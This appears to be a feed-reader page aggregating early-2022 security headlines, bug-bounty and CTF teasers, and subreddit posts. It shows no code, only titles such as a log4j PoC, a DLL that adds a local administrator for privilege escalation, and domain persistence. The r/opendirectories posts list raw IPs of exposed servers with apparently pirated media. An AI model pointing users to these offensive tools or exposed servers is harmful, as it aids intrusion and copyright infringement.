    这或许表明在新的工作方式趋于“常态化”后,外界更热衷于关注网络犯罪的创新。  ( 1 min )
    安全态势感知的前世今生
    安全态势感知的出现是国家安全战略发展的必然。  ( 1 min )
    DNS重绑定攻击研究
    每点击一个可疑的链接,DNS重绑定攻击除了利用存在DNS重绑定漏洞的应用外,甚至可能会导致攻击者瞬间控制你连接家庭网络的其它互联设备。  ( 1 min )
    Broward Health 披露影响 130 多万人的数据泄露事件
    值得注意的是,入侵点被确定为第三方医疗提供商,该提供商通过接入医疗系统提供服务,因此拥有一定的访问权限。  ( 1 min )
    2022年第一天,微软Exchange无法发送电子邮件
    新年伊始,万象更新,但在2022年的第一天,微软却给大家开了一个不大不小的“玩笑”。  ( 1 min )
    希腊黑客“攻陷”NASA局长社交账号
    美国宇航局(NASA)局长Parimal Kopardekar的Twitter账户遭遇希腊黑客入侵。  ( 1 min )
    应急响应之外联请求分析
    针对DNS恶意请求解析事件进行处理分析  ( 1 min )
    2021年流行勒索软件盘点
    2021年全球制造业、服务业、建筑、金融、能源、医疗、工控和政府组织机构等频遭勒索软件攻击,给全球产业产值造成严重损失。  ( 1 min )
    苹果iOS曝doorLock漏洞,能让手机“变砖”
    在Apple HomeKit 中发现了一个名为“doorLock”的新型持续拒绝服务漏洞,影响的系统版本从IOS14.7到IOS15.2。  ( 1 min )
    网信办等四部门发布《互联网信息服务算法推荐管理规定》
    《规定》明确“应用算法推荐技术”,是指利用生成合成类、个性化推送类、排序精选类、检索过滤类、调度决策类等算法技术向用户提供信息。
    十三部门修订发布《网络安全审查办法》,2022年2月15日施行
    《办法》明确掌握超过100万用户个人信息的网络平台运营者赴国外上市必须向网络安全审查办公室申报网络安全审查。
    2021勒索病毒大盘点
    勒索病毒为何有这么大的能量,让所有行业“谈虎色变”?面对勒索病毒,难道只能“躺平”?  ( 1 min )
    实战中的越权攻击总结
    本篇是对今年渗透测试遇到的越权攻击进行一下总结,各位师傅共同学习,若有不足或建议,也望大家及时提出。  ( 1 min )
  • Open

    Domain Persistence – AdminSDHolder
    Utilizing existing Microsoft features for offensive operations is very common during red team assessments as it provides the opportunity to blend in with the environment… Continue reading → Domain Persistence – AdminSDHolder  ( 3 min )
    Domain Persistence – AdminSDHolder
    Utilizing existing Microsoft features for offensive operations is very common during red team assessments as it provides the opportunity to blend in with the environment… Continue reading → Domain Persistence – AdminSDHolder  ( 3 min )
  • Open

    Domain Persistence – AdminSDHolder
    Utilizing existing Microsoft features for offensive operations is very common during red team assessments as it provides the opportunity to blend in with the environment… Continue reading → Domain Persistence – AdminSDHolder  ( 3 min )
    Domain Persistence – AdminSDHolder
    Utilizing existing Microsoft features for offensive operations is very common during red team assessments as it provides the opportunity to blend in with the environment… Continue reading → Domain Persistence – AdminSDHolder  ( 3 min )
  • Open

    Solving OSINT Dojo’s 2022’s first quiz
    Today I am solving first 2022 quiz post by #OSINTDojo Continue reading on Medium »  ( 2 min )
    Claim: China operated black jail in Dubai — Open Source Analysis
    In August 2021 Associated Press (AP) reported a claim that a Chinese woman was held at a “Chinese-run secret detention facility ” in Dubai Continue reading on Medium »  ( 4 min )
  • Open

    Misconfiguration OAuth Lead Account Takeover
    Assalamuallaikum Wr.Wb Hello friends I want to explain about the bug bounty that I got in 2020, this vulnerability lies in the weak OAuth Continue reading on Medium »  ( 1 min )
  • Open

    December 2021 update for Netsparker Standard 6.3
    We’re delighted to announce the December 2021 update for Netsparker Standard 6.3. The highlights of this release are software composition analysis (SCA), the OWASP Top Ten 2021 Report, and support for scanning GraphQL APIs. READ MORE  ( 2 min )
  • Open

    Simple DLL that creates and adds an user to the local Administrators group
    A simple C++ DLL that creates and add a user to the Local #Administrator group. Useful when dealing with privilege escalation on Windows to gain local administrator access and do not care of opsec. Repo: https://github.com/notdodo/adduser-dll submitted by /u/d_o_d_o_ [link] [comments]  ( 1 min )
  • Open

    doorLock: HomeKit DoS/semi-bricking Vulnerability (Via Home Invitation)
    Article URL: https://twitter.com/trevorspiniolas/status/1477185285784051712 Comments URL: https://news.ycombinator.com/item?id=29793176 Points: 2 # Comments: 1  ( 1 min )
  • Open

    Previse from HackTheBox — Detailed Walkthrough
    Showing all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 5 min )
    TryHackme — Cross-Site Scripting
    Malicious Script Injection  ( 3 min )
    Proof of concept: zero-day- log4j RCE
    What is log4j?  ( 3 min )
    OWASP-Access Control Vulnerability
    This article is going to focus on Access control security and Broken Access control, it will summarize the thoughts, procedures and…  ( 6 min )
  • Open

    Previse from HackTheBox — Detailed Walkthrough
    Showing all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 5 min )
    TryHackme — Cross-Site Scripting
    Malicious Script Injection  ( 3 min )
    Proof of concept: zero-day- log4j RCE
    What is log4j?  ( 3 min )
    OWASP-Access Control Vulnerability
    This article is going to focus on Access control security and Broken Access control, it will summarize the thoughts, procedures and…  ( 6 min )
  • Open

    Previse from HackTheBox — Detailed Walkthrough
    Showing all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 5 min )
    TryHackme — Cross-Site Scripting
    Malicious Script Injection  ( 3 min )
    Proof of concept: zero-day- log4j RCE
    What is log4j?  ( 3 min )
    OWASP-Access Control Vulnerability
    This article is going to focus on Access control security and Broken Access control, it will summarize the thoughts, procedures and…  ( 6 min )

  • Open

    ASK: What should I look in a Masters Program before opting it
    Hey everyone, I have been thinking of pursuing a masters in cybersecurity. I love tinkering with low level stuff, especially embedded systems and exploit development. But I don't know if the universities offer courses targeting them. Can the community suggest me some good unis that I can apply too based on my inclination. PS: Can someone also take a look at my SOP, I don't have anyone who can proofread my SOP. submitted by /u/sidhu97ss [link] [comments]  ( 1 min )
  • Open

    Basic Overview: Active Directory Hacking
    Introduction Continue reading on Medium »  ( 3 min )
    TryHackMe — Advent of Cyber 3 (2021) WriteUp
    WriteUp for all Challenges in THM Advent of Cyber 3 Continue reading on Medium »  ( 16 min )
  • Open

    Disney Channel Stuff+
    submitted by /u/International_Milk_1 [link] [comments]
    Dr Who (The original series) Seasons 1-8.
    submitted by /u/International_Milk_1 [link] [comments]
    Some old movies and Tv series
    submitted by /u/International_Milk_1 [link] [comments]
    Columbo episodes
    submitted by /u/International_Milk_1 [link] [comments]
    Mixture off BBC Radio stuff. Fact and Fiction.
    submitted by /u/International_Milk_1 [link] [comments]
    movies for the film buff
    submitted by /u/International_Milk_1 [link] [comments]
    archive.org link to Japanese movies, tv series with english subtitles filtered by title.
    submitted by /u/International_Milk_1 [link] [comments]
    large dex
    http://90.146.184.46/ submitted by /u/Dagad0s [link] [comments]
    Musikk (FLAC + MP3)
    https://85.166.158.78/RaidNAS/Lyd/Musikk/ [DIR] Atreyu/ 11-Oct-2019 23:56 - [DIR] Avenged.Sevenfold/ 08-Nov-2019 23:46 - [DIR] Bullet.For.My.Valentine/ 08-Nov-2019 23:52 - [DIR] Metallica/ 12-Oct-2019 00:06 - [DIR] Nirvana/ 12-Oct-2019 00:06 - [DIR] Papa.Roach/ 12-Oct-2019 00:08 - [DIR] Pink.Floyd/ 12-Oct-2019 00:13 - submitted by /u/Dagad0s [link] [comments]
    mostly Metallica / Nightwish (largely FLAC 24/96)
    https://seisho.us/swap/ submitted by /u/Dagad0s [link] [comments]  ( 1 min )
    Sheetmusic for (wind)band
    Nice collection of sheetmusic (scores and parts) for (wind)band https://camdencommunityband.org.au/wp-content/uploads/2019/07/ submitted by /u/notmcgvien [link] [comments]  ( 1 min )
    nice selection (FLAC \ MP3)
    http://51.198.90.160/resources/Music/ submitted by /u/Dagad0s [link] [comments]
    I made an OD browser with IMDB ratings built in
    Hey r/opendirectories! ​ I made a web app that helps me identify poorly rated movies in open directories so I can avoid them. This post isn't to promote my project or anything -- which is why I am not disclosing the name or sharing the link to the git repo -- I am writing to gather feedback and to see if people would be interested in using it when it becomes mature enough one day. ​ ​ https://i.redd.it/nblwcs660f981.gif ​ First off, why I made this tool and what the tool does: ​ I am a casual OD user who downloads just a couple movies at a time. It's not difficult to guess that I do a lot of Google searches to decide on what I want to download -- sometimes you can go through 20+ poorly reviewed movies before seeing something decent. I wanted something I can use to rule out bad mov…  ( 3 min )
    An MSX site that links to a bunch of directories.
    Just scroll down to enjoy this neat little rabbithole. https://www.file-hunter.com submitted by /u/EmuAnon34 [link] [comments]
    "New Wave Theatre" - Episodes 1 through 25: Internet Archive. Live music from the early 1980s on Night Flight
    submitted by /u/FireHole [link] [comments]
  • Open

    Log4Shell: RCE 0-day exploit on
    U.S. Dept Of Defense disclosed a bug submitted by mr_x_strange: https://hackerone.com/reports/1429014
  • Open

    What was 2021 like for your SOC?
    What was 2021 like for your SOC? Any workflow or tool changes that made an impact? Did your team handle more or less incidents? submitted by /u/wowneatlookatthat [link] [comments]
    Phone camera related question
    How do I find out whether my phone's camera is turned on or off? I don't have any sort of LED indicator next to my phone's camera. Is there any other way? To see whether camera is being used or not? If I'm using (for example: Snapchat) to take a picture/video, then can other camera apps on my phone like Tiktok/Kiradroid/WhatsApp camera also be turned on simultaneously ? Is it possible for other camera apps to see what I'm recording on Snapchat? note- On Tiktok's permission : run foreground service is mentioned. submitted by /u/hamza_37 [link] [comments]  ( 1 min )
    Is it safe to hide insecure servers in intranet?
    Is it generally safe to hide insecure servers(like a REST API server without authentication, no JWT no basic Auth) in intranet(or docker network without publishing the port)? What kind of risk will I be exposed to? Let say I have server A, B and C, and I will publish and expose server A to public, and I only want server B and C to be reached by server A. Is it safe to keep server B and C in intranet(server A will be in that intranet as well, but exposed to public)? submitted by /u/hksparrowboy [link] [comments]  ( 2 min )
    Call listening symptoms, spy tech, dual sim or cloning ? How can one get proof of this that is admissible as evidence ?
    I am being stalked by my ex pretty sure she has screwed herself a army of tec savy individuals to help her. It’s been almost 2 years I just want to get proof or get her to leave me alone. So if someone was spoofing my phone listening to my calls is it a possibility that if they hung up before I was off the phone I could get a incoming call from the person I was talking to currently and there phone would suddenly start ringing like they called me again ? This phenomena has happened 3-5 times to me before I realized it has only happened sense my ex moved out she somehow had my phone cloned and was following me all over the internet as she could see where I was posting. I don’t think she could modify things on the phone like screen shots but someone else handles package delivery. I got a new Samsung phone and within three days I had four apps that had been sideloaded on there one of them the Verizon app that allows you to supposedly hack a phone I of course deleted them. I watched the Google family app appear miraculously onto my phone screen at a concert while Trying to discern if that was my ex standing approximately 40 yards away who should’ve been home with our daughter. I moved into see if it was her and she hid behind her hair while walking 20 yards ahead and exited the concert. Pretty sure she has contacted clients and told them outlandish lies to create problems, women I was talking to, follows me all over the internet posting where I post creating accounts where I have accounts all in the name of narc psychopath bs it was bad enough all the cheating that came to light and the mental abuse when we lived together now this shit. Any help would be great thanks. submitted by /u/itwasEMOTIONALmurder [link] [comments]  ( 4 min )
    ELI5: Why can a message not be decrypted with the public key in in PKI?
    Apologies if this is the incorrect sub for this, but this is the only one I found that I thought would fit. I’m studying for Sec+, and currently trying to understand the PKI and asymmetric encryption protocols. Say for example I encrypt a message using google’s public key to Google.com, and a MITM intercepts it. Why can’t the MITM decrypt the message using the public key when it was encrypted using the public key in the first place? Why does it have to be decrypted using the private key? Thank you for the help! submitted by /u/bookandrelease [link] [comments]  ( 3 min )
  • Open

    A New Web Skimmer Campaign Targets Real Estate Websites Through Attacking Cloud Video Distribution Supply Chain
    A supply chain attack leveraging a cloud video platform to distribute web skimmer campaigns compromised more than 100 real estate sites. The post A New Web Skimmer Campaign Targets Real Estate Websites Through Attacking Cloud Video Distribution Supply Chain appeared first on Unit42.
  • Open

    Module-1 | Introduction -Pentesting & Bypassing Cloud Web Application Firewall of Major Clouds
    Why you should not trust the cloud WAF? Continue reading on Medium »  ( 3 min )
    100%OFF | Pentesters Practical Approach for Bug Hunting and Bug Bounty
    Welcome to this course on Pentesters Practical Approach for Bug Hunting and Bug Bounty. To enjoy this course, you need a positive attitude Continue reading on Medium »  ( 1 min )
    Bug Report Update
    As our testnet and bugbounty continues to thrive, we are very grateful for the active participation of our community to fix any and every… Continue reading on Medium »  ( 1 min )
    Story of YouTube’s Unfixable Ads Bypass
    Hello there! I hope everything is going well with you; today I will talk about my YouTube Ads bypass. Continue reading on Medium »  ( 3 min )
    P5 to P1: Intresting Account Takeover
    Hello Guys, Continue reading on Medium »  ( 2 min )
    IDOR leads to leak Private Details
    I Wish you Merry Christmas & happy new year to you readers. May this year bring us nothing more than love, joy, happiness, P1,P2… Continue reading on InfoSec Write-ups »  ( 2 min )
  • Open

    Best free utility to take an image of an iOS device?
    Hi there, I’m learning how to use Autopsy, and it has an iOS ingest module (iLEAPP). iLEAPP will accept a compressed .tar/.zip file or an iTunes backup. What’s the best way to capture an image of an iOS device? Would an iTunes backup encompass almost everything (excluding Health data, etc.), or is there a better utility? Thanks! submitted by /u/hamsterbilly [link] [comments]  ( 1 min )
  • Open

    A Beginner's Story on How a Cheapo Standard Issue Router was hacked.
    submitted by /u/secnigma [link] [comments]  ( 1 min )
    One of my better-documented exploits, CVE-2017-5816 whitepaper
    submitted by /u/oxagast [link] [comments]
    Vulnerability in log4j 2.17.0 more hype than substance | LunaSec
    submitted by /u/breadchris [link] [comments]  ( 1 min )
    /r/netsec's Q1 2022 Information Security Hiring Thread
    Overview If you have open positions at your company for information security professionals and would like to hire from the /r/netsec user base, please leave a comment detailing any open job listings at your company. We would also like to encourage you to post internship positions as well. Many of our readers are currently in school or are just finishing their education. Please reserve top level comments for those posting open positions. Rules & Guidelines Include the company name in the post. If you want to be topsykret, go recruit elsewhere. Include the geographic location of the position along with the availability of relocation assistance or remote work. If you are a third party recruiter, you must disclose this in your posting. Please be thorough and upfront with the position details. Use of non-hr'd (realistic) requirements is encouraged. While it's fine to link to the position on your companies website, provide the important details in the comment. Mention if applicants should apply officially through HR, or directly through you. Please clearly list citizenship, visa, and security clearance requirements. You can see an example of acceptable posts by perusing past hiring threads. Feedback Feedback and suggestions are welcome, but please don't hijack this thread (use moderator mail instead.) submitted by /u/ranok [link] [comments]  ( 2 min )
    Malicious Telegram Installer Drops Purple Fox Rootkit
    submitted by /u/woja111 [link] [comments]  ( 1 min )
    google/log4jscanner: A log4j vulnerability filesystem scanner and Go package for analyzing JAR files.
    submitted by /u/maryetan [link] [comments]
    C++ Memory Corruption (std::vector) - part 2
    submitted by /u/Gallus [link] [comments]  ( 1 min )
  • Open

    Vulnerability in Log4j 2.17.0 more hype than substance
    Article URL: https://www.lunasec.io/docs/blog/log4j-hype-train/ Comments URL: https://news.ycombinator.com/item?id=29782471 Points: 2 # Comments: 0  ( 6 min )
  • Open

    SecWiki News 2022-01-03 Review
    SecWiki周刊(第409期) by ourren QingScan: 漏洞扫描器粘合剂 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-01-03 Review
    SecWiki周刊(第409期) by ourren QingScan: 漏洞扫描器粘合剂 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Optimizing Windows Function Resolving: A Case Study Into GetProcAddress - phasetw0
    submitted by /u/dmchell [link] [comments]
    airbus-cert/Invoke-Bof: Load any Beacon Object File using Powershell!
    submitted by /u/dmchell [link] [comments]
  • Open

    NOTE: I assume that the keys have been exchanged using any key exchange protocol.
    Features:  ( 4 min )
    REvil — Incident Response with Redline
    Recently, I’ve been doing some more study around incident response. To get some more practice, I decided to attempt the free TryHackMe…  ( 7 min )
    Yogosha Christmas 2021 CTF
    Hello security enthusiasts this Christmas i played “Yogosha CTF 2021” challenge as i got a mail from their team on 28th December, and i…  ( 5 min )
    Day 1, Installing Kali Linux — 100DaysofHacking
    Hello everyone , this is Ayush and from today 01–01–2022 , I’m going to start 100daysofhacking challenge to improve my hacking skills . So…  ( 3 min )
    Mirai from Hackthebox
    Pi hole Default Credentials and File System Forensics  ( 4 min )
    How I found Clickjacking bug
    Bug Bounty Writeup  ( 2 min )
    TryHackme-Vulnversity PART 1
    CTF Writeup  ( 2 min )
    Bug Hunting Journey of 2021
    Heyy Everyoneeee,  ( 22 min )
    IDOR leads to leak Private Details
    I Wish you Merry Christmas & happy new year to you readers. May this year bring us nothing more than love, joy, happiness, P1,P2…  ( 2 min )
    Year in review 2021: Top 5 things that happened in cyber security
    Hello Hackers, Yuvaraj here. Hope you are all doing good; 2021 is likely to be the year of a data breach because many big tech companies…  ( 3 min )
  • Open

    NOTE: I assume that the keys have been exchanged using any key exchange protocol.
    Features:  ( 4 min )
    REvil — Incident Response with Redline
    Recently, I’ve been doing some more study around incident response. To get some more practice, I decided to attempt the free TryHackMe…  ( 7 min )
    Yogosha Christmas 2021 CTF
    Hello security enthusiasts this Christmas i played “Yogosha CTF 2021” challenge as i got a mail from their team on 28th December, and i…  ( 5 min )
    Day 1, Installing Kali Linux — 100DaysofHacking
    Hello everyone , this is Ayush and from today 01–01–2022 , I’m going to start 100daysofhacking challenge to improve my hacking skills . So…  ( 3 min )
    Mirai from Hackthebox
    Pi hole Default Credentials and File System Forensics  ( 4 min )
    How I found Clickjacking bug
    Bug Bounty Writeup  ( 2 min )
    TryHackme-Vulnversity PART 1
    CTF Writeup  ( 2 min )
    Bug Hunting Journey of 2021
    Heyy Everyoneeee,  ( 22 min )
    IDOR leads to leak Private Details
    I Wish you Merry Christmas & happy new year to you readers. May this year bring us nothing more than love, joy, happiness, P1,P2…  ( 2 min )
    Year in review 2021: Top 5 things that happened in cyber security
    Hello Hackers, Yuvaraj here. Hope you are all doing good; 2021 is likely to be the year of a data breach because many big tech companies…  ( 3 min )
  • Open

    NOTE: I assume that the keys have been exchanged using any key exchange protocol.
    Features:  ( 4 min )
    REvil — Incident Response with Redline
    Recently, I’ve been doing some more study around incident response. To get some more practice, I decided to attempt the free TryHackMe…  ( 7 min )
    Yogosha Christmas 2021 CTF
    Hello security enthusiasts this Christmas i played “Yogosha CTF 2021” challenge as i got a mail from their team on 28th December, and i…  ( 5 min )
    Day 1, Installing Kali Linux — 100DaysofHacking
    Hello everyone , this is Ayush and from today 01–01–2022 , I’m going to start 100daysofhacking challenge to improve my hacking skills . So…  ( 3 min )
    Mirai from Hackthebox
    Pi hole Default Credentials and File System Forensics  ( 4 min )
    How I found Clickjacking bug
    Bug Bounty Writeup  ( 2 min )
    TryHackme-Vulnversity PART 1
    CTF Writeup  ( 2 min )
    Bug Hunting Journey of 2021
    Heyy Everyoneeee,  ( 22 min )
    IDOR leads to leak Private Details
    I Wish you Merry Christmas & happy new year to you readers. May this year bring us nothing more than love, joy, happiness, P1,P2…  ( 2 min )
    Year in review 2021: Top 5 things that happened in cyber security
    Hello Hackers, Yuvaraj here. Hope you are all doing good; 2021 is likely to be the year of a data breach because many big tech companies…  ( 3 min )
  • Open

    跨平台网络安全工具套件CaptfEncoder v3.0.1
    CaptfEncoder 是一款跨平台网络安全工具套件,V3 版本使用Rust开发,可执行程序体积小,速度更快、性能更优、功能更强。  ( 1 min )

  • Open

    Quick question
    I am a novice, please go easy on me for asking this lol. If I am asked to assign an IPv4 to a PC NIC, what does this look like in CLI? Is this the same as simply assigning an IP to the PC itself or is it something else? submitted by /u/crumbjuice [link] [comments]  ( 1 min )
    Masters degree, good and cheap ones?
    Don't ask why, I know most companies don't give a crap, I know they prefer experience, etc... Until I can get a job that isn't with my current employer/in this sector, I have to play the game as best I can. I am trying to find both a cheap and good masters degree program I can do part time and online (or at least one that is ABET\would make managers who only care about ABET happy). I am both looking at computer science and cybersecurity masters, but I got a B.S. in cybersecurity which makes masters of computer science hard to get into. So far, the only one I have found that checks those boxes is Georgia Tech's online masters (though I seriously doubt they will let me in the computer science program so I will have to do the cybersecurity one). I keep digging around but it seems all the ones I can find either charge high rates, and/or lack anything actually being taught. Do you guys know of any? All the digging around I have done has shown me that its that or get ready to fork out 30k+ (if I didn't already pay too much for my B.S.). submitted by /u/RandomPerson05478 [link] [comments]  ( 2 min )
    Is NET::ERR_CERT_DATE_INVALID a sure sign of danger?
    "Your connection is not private Attackers might be trying to steal your information from www.url.example (for example, passwords, messages, or credit cards). Learn more NET::ERR_CERT_DATE_INVALID" Hello, Recently (past few days) I have been taking up an avenue of search that has led me to many primeval websites from 2009 and earlier, And I have noticed a frequent pattern that Chrome does not want me to access these websites. However, I am having a hard time figuring out if the websites are actually dangerous or, in typically invasive fashion, the Chrome devs have simply put a roadblock in the way of accessing sites that aren't up to current standards (because sometimes they MIGHT be dangerous). Again, this is happening to rather old and niche websites from the birth of the internet. At the bottom of the warning page is a large, friendly button, saying, "Take me back to safety", which links to the chrome homepage. Thanks, and apologies if I have broken the sub rules somehow submitted by /u/Icy_Ad2505 [link] [comments]  ( 1 min )
    What is the general best practice for preventing brute force attacks while minimizing user impact ;
    I am trying to understand how to best prevent bruteforcing attacks on various externally accessible services. If you limit the amount of attempts for a given account, then you solve the bruteforcing quandary but introduce another attack vector where someone can indefintely lock out legitimate users out of their‏‏‎‏‏‎‏‏‎‏‏‎­accounts by just knowing their username. You can limit it by something like IP, but there have been several real world examples which show how cheap it is to quickly spin up thousands of different IPs to bypass this protection via AWS/Azure. I'm not aware of any other techniques that could identify legitimate requests from illegitimate ones. My thinking was something like a system in which successful logins log the IP from which it was accessed and allow login attempts from that IP even if the user is locked out. However that also has some underlying issues. What is the general security best practice for this sort of attack? submitted by /u/awedRaisins7 [link] [comments]  ( 5 min )
  • Open

    کرداری Fuzz چییە؟ بۆچی بەکار دەهێندرێ؟!
    کرداری Fuzz یەکێکە لە گرنگترین ئەو کارانەی کە هاککەر یاخوود #BugHunters یاخوود باشتر وایە بڵێم #PenTester ــــەکان بەکاری دێنن بۆ… Continue reading on Medium »  ( 1 min )
  • Open

    کرداری Fuzz چییە؟ بۆچی بەکار دەهێندرێ؟!
    کرداری Fuzz یەکێکە لە گرنگترین ئەو کارانەی کە هاککەر یاخوود #BugHunters یاخوود باشتر وایە بڵێم #PenTester ــــەکان بەکاری دێنن بۆ… Continue reading on Medium »  ( 1 min )
  • Open

    The Who 24 Bit Vinyl Pack
    http://www.xuxinlei.com/downloads/The%20Who%2024%20Bit%20Vinyl%20Pack/ [DIR] 1967 - The Who - The Who Sell Out [24-96]/ 2021-12-28 13:42 - [DIR] 1968 - The Who - Dogs & Call Me Lightning (mono single, 24-96)/ 2021-12-28 13:42 - [DIR] 1969 - Tommy [vinyl]/ 2021-12-28 13:42 - [DIR] 1971 - The Who - Meaty Beaty Big And Bouncy (24-96)/ 2021-12-28 13:42 - [DIR] 1974 - The Who - Odds & Sods/ 2021-12-28 13:42 - [DIR] The Who - A Quick One [24-96]/ 2021-12-28 13:42 - [DIR] The Who - My Generation (1965) [flac] {CR 200g, mono, 24-96}/ 2021-12-28 13:42 - [DIR] The Who - Quadrophenia (1973) [VINYL] {24-96} {Classic 200g Quiex SV-P}/ 2021-12-28 13:42 - [DIR] The Who - Who’s Next 1971/ 2021-12-28 13:42 - submitted by /u/Dagad0s [link] [comments]  ( 1 min )
    music, movies, tv
    small bit of Iranian music Index of /music/Various-Artists--Artesh-128 (r3d-dl.online) more music Index of /music/playlist (blackthebeastmusic.com) movies and tv series (Only some with English audio) Index of /download (zoppello.fr) submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Old scene releases (1999-2007)
    https://c64.rulez.org/pub/c64/Scene/Old/ submitted by /u/-ForFuckSake [link] [comments]
    Some scene releases for software, games and other things
    http://75.86.210.23/archive/ submitted by /u/-ForFuckSake [link] [comments]  ( 1 min )
    Metroid (GBA) hacks and scripts
    submitted by /u/Pleasant_Jelly_8397 [link] [comments]
    NES, SNES, GBA roms
    submitted by /u/Pleasant_Jelly_8397 [link] [comments]  ( 1 min )
    Images of "tiers" (memes)
    submitted by /u/Pleasant_Jelly_8397 [link] [comments]
    RPG rulebooks
    submitted by /u/Pleasant_Jelly_8397 [link] [comments]
    various stuff
    Music (amateuer bands, i guess) Index of /audio (randanderson.com) Music mashups, Oasis, Christmas and non music stuff. Index of /ayrshiredj/website/Stuff (seedhost.eu) christmas songs. Make a playlist Musical index of /radio/christmas/ (foamtotem.org) submitted by /u/International_Milk_1 [link] [comments]
  • Open

    cedowens/Inject_Dylib: Swift code to programmatically perform dylib injection
    submitted by /u/dmchell [link] [comments]
  • Open

    Turning off Wi-Fi & Bluetooth interfaces automatically in iOS
    submitted by /u/hoytva [link] [comments]
    A simple, high-level framework on how & when to effectively use WAFs
    submitted by /u/jubbaonjeans [link] [comments]  ( 3 min )
    Kickstop the Blind Ego (BlindEagle writeup by sn0wmonster from 2016)
    submitted by /u/sn0wm0nster [link] [comments]
  • Open

    How i was able to bypass a Pin code Protection
    Hello guys,  I Hope all are doing good. my name is kerolos sameh(AKA xko2x) , I’m 17 years old bug hunter in hackerone. Continue reading on Medium »  ( 2 min )
    He is already here: Privileges escalation due to invalidating current users
    Dear his/her we back again our story today is about privileges escalation This vulnerability enables the unauthorized user to add an… Continue reading on Medium »  ( 2 min )
    The Story Of How I Bypass SSO Login
    Hello everyone, Continue reading on Medium »  ( 2 min )
    elasticpwn: how to collect and analyse data from exposed Elasticsearch and Kibana instances
    Your Elasticsearch and Kibana instances are open, and that’s a real problem.. Continue reading on Medium »
    Bug Bounty Recon: Vertical Correlation (and the secret to succeeding).
    Vertical Correlation — The process of finding subdomains from a root domain. Continue reading on Medium »  ( 6 min )
  • Open

    EMAIL SPOOFING
    Khan Academy disclosed a bug submitted by hackthedevil: https://hackerone.com/reports/496360
    Default credentials lead to Spring Boot Admin dashboard access
    8x8 disclosed a bug submitted by sparroww: https://hackerone.com/reports/1417635
  • Open

    SecWiki News 2022-01-02 Review
    playwright: Playwright is a framework for Web Testing and Automation-爬虫 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-01-02 Review
    playwright: Playwright is a framework for Web Testing and Automation-爬虫 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    @RealTryHackMe #AdventOfCyber Series: Challenge 16 — Ransomware Madness #TisTheSeasonForHacking
    Another day, another challenge… Continue reading on Medium »  ( 1 min )
    OSINT — Free Tools for better Satellite Imagery
    Hello Everyone, in this article we will be looking at some of the free and effective tools for Satellite imagery. Every tool has got some… Continue reading on Medium »  ( 2 min )
  • Open

    Intigriti’s December XSS challenge By E1u5iv3F0x
    This year’s Christmas challenge is crafted by E1u5iv3F0x. It was very original and educational. Continue reading on Medium »  ( 3 min )
  • Open

    ZIP file has been "obfuscated" and claims to be the 65536th part of a multi-volume archive. (cannot extract)
    submitted by /u/GalaxyDan2006 [link] [comments]  ( 1 min )
    My college gave me a voucher for the CHFI. What study material exists for it?
    Title really says it all. I am aware of people's views on EC-Council and hold some of my own but it's a free voucher and looks good. submitted by /u/threadstalkerpoint1 [link] [comments]  ( 1 min )
  • Open

    [译] [论文] BBR:基于拥塞(而非丢包)的拥塞控制(ACM, 2017)
    译者序 本文翻译自 Google 2017 的论文: Cardwell N, Cheng Y, Gunn CS, Yeganeh SH, Jacobson V. BBR: congestion-based congestion control. Communications of the ACM. 2017 Jan 23;60(2):58-66. 论文副标题:Measuring Bottleneck Bandwidth and Round-trip propagation time(测量瓶颈带宽和往返传输时间)。 BBR 之前,主流的 TCP 拥塞控制算法都是基于丢包(loss-based)设计的, 这一假设最早可追溯到上世纪八九十年代,那时的链路带宽和内存容量分别以 Mbps 和 KB 计,链路质量(以今天的标准来说)也很差。 三十年多后,这两个物理容量都已经增长了至少六个数量级,链路质量也不可同日而语。特别地,在现代基础设施中, 丢包和延迟不一定表示网络发生了拥塞,因此原来的假设已经不再成立。 Google 的网络团队从这一根本问题出发,(在前人工作的基础上) 设计并实现了一个基于拥塞本身而非基于丢包或延迟的拥塞控制新算法,缩写为 BBR。 简单来说,BBR 通过应答包(ACK)中的 RTT 信息和已发送字节数来计算 真实传输速率(delivery rate),然后根据后者来调节客户端接下来的 发送速率(sending rate),通过保持合理的 inflight 数据量来使 传输带宽最大、传输延迟最低。另外,它完全运行在发送端,无需协议、 接收端或网络的改动,因此落地相对容易。 Google 的全球广域网(B4)在 2016 年就已经将全部 TCP 流量从 CUBIC 切换到 BBR, 吞吐提升了 2~25 倍;在做了一些配置调优之后,甚至进一步提升到了 133 倍(…

  • Open

    A persistent denial of service vulnerability affecting iOS
    Article URL: https://trevorspiniolas.com/doorlock/doorlock.html Comments URL: https://news.ycombinator.com/item?id=29762490 Points: 48 # Comments: 12  ( 4 min )
  • Open

    Mythology and Occultist Books.
    https://www.magicgatebg.com/Books/ Looks to be both books on mythology and occultist practices. Pretty small >1gb I think. Gotta wade through some crap, but there appears to be some good resources here. submitted by /u/GiantFangedBanana [link] [comments]  ( 1 min )
    My First Contribution
    Heres a bunch of cord-cutting apps (Firestick/Android TV) https://dr-venture.com/apks/ submitted by /u/Buddy-the-elf321 [link] [comments]
    pictures of carpet
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    iron maiden alnums zipped -(SEE COMMENT for content.) Happy new year everybody
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
  • Open

    OSINT NEDİR?
    OSINT(Open Source Intelligence) yani açık kaynak istihbaratı anlamına gelmektedir. Kısaca pasif bilgi toplama aracıdır diyebiliriz. Pasif… Continue reading on Medium »  ( 2 min )
  • Open

    How I Reverse-Engineered one of the biggest GSM Operator’s application.
    This is a story of how I found a critical bug in one of the biggest GSM Operator’s application in our country. Continue reading on Medium »  ( 5 min )
    AlbusSecurity:- Penetration-list 01 Information Disclosure — Part 1
    Hello Listeners, I hope you all are well. Firstly I will introduce myself I’m Aniket, I’m an Information technology officer at 5f eco… Continue reading on Medium »  ( 3 min )
    Oversimplified — Bug Bounty
    Undoubtedly, most of us believe that finding vulnerabilities in the software looks something like the image above. “Hacking” has always… Continue reading on Medium »  ( 5 min )
    UNAUTHORIZED ACCESS LEADS TO PII DATA LEAKAGE
